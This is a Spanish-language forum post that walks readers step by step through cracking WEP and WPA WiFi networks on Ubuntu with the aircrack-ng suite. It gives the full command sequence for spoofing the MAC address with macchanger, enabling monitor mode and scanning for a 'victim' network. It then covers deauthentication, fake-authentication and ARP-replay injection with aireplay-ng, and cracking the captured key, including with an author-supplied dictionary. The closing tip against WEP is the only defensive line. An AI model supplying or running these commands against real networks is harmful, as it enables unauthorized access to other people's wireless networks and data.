hola amigos:
he seguido este post y muchos que posteais en este for y la verdad esque siempre me ha sido de gran ayuda primero agradecer por todo eso.
2º como cita dvdr en otro post junto a heaviloto
estos son los pasos para poner el parche de los drivers en ubuntu maverick 10.10
por que a estas alturas ya estan diponibles para descarga incluido para 10.04
yo los he probado y va de maravilla yo tengo una alfa 500 con chipset rtl8187l
he corregido un error que daba pero gracias a que lo indicaba dvdr un poco mas adelante en el post
Esto va bien se puede copiar, pegar y ejecutar pero: (no ejecute ningun codigo si no sabe lo que hace ya que es un peligro para tu ordenador y para tus datos "esto siempre hay que tenerlo presente
3º una vez tengas hecho esto puedes empezar con el ataque
Lo primero es instalar la Suite aircrack-ng
sudo apt-get install aircrack-ng
Luego instalamos Macchanger
sudo apt-get install macchanger
Una vez instalado nos aseguramos de no estar conectados en ninguna red inalambrica, dando click derecho en el icono de la red y desactivando la red inalambrica, y abrimos una terminal:
- Activamos modo monitor en nuestra tarjeta de red (NO EN TODAS SE PUEDE, SI NO SE PUEDE ACTIVAR, NO PODRÁS CRACKEAR)
Sudo airmon-ng start wlan0
- Vemos que nos sale que se activo en mon0, asi es que trabajaremos con mon0
-Damos de Baja mon0
sudo ifconfig mon0 down
-Cambiamos la direccion mac de mon0 por 00:11:22:33:44:55
sudo macchanger -m 00:11:22:33:44:55 mon0
- Damos de alta mon0
sudo ifconfig mon0 up
- Escaneamos las redes disponibles, y encontraremos nuestra victima
sudo airodump-ng mon0
- Detenemos la escaneada pulsando
control – c
- Ejecutamos airodump-ng, cambiando los datos de los corchetes por los de nuestra victima
sudo airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0
- Abrimos otra terminal SIN CERRAR LA ANTERIOR y empezamos el ataque a la red
- Cambiando los datos de los corchetes por los de nuestra victima
PARA WEP
sudo aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0
PARA WPA
sudo aireplay-ng -0 1 -a [direccion MAC] -c [STATION] mon0
- Abrimos otra terminal SIN CERRAR LA ANTERIOR y ejecutamos en la nueva terminal cambiando los datos de los corchetes por los de nuestra victima.
PARA WEP
sudo aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b [direccion MAC] -h 00:11:22:33:44:55 mon0
- Le decimos que si (y) y le damos enter
PARA WPA
sudo aircrack-ng -w [/directorio/del/diccionario.lst] [NOMBRE]*.cap
Descarga del diccionario para WPA (Subido Por MI)
PARA WEP
- Abrimos la 4ta y ultima terminal SIN CERRAR LA ANTERIOR y ejecutamos en la nueva terminal cambiando los datos de los corchetes por los de nuestra victima.
sudo aircrack-ng -z [nombre red]*.cap
y esperamos a que nos descifre la clave, una ves descifrada con exito te dara la clave en formato [XX:XX:XX:XX:XX], y activa tu red inalambrica dando click derecho al icono de la red, Seleccionamos la red crackeada e ingresamos la clave que nos dio de resultado aircrack en formato XXXXXXXXXX. Y LISTO! ya crackeaste una red WIFI con encriptacion WEP o WPA.
Consejo: NO UTILIZES ENCRIPTACION WEP PARA TU RED, UTILIZA EN LUGAR WPA!
espero que le sirva a alguien.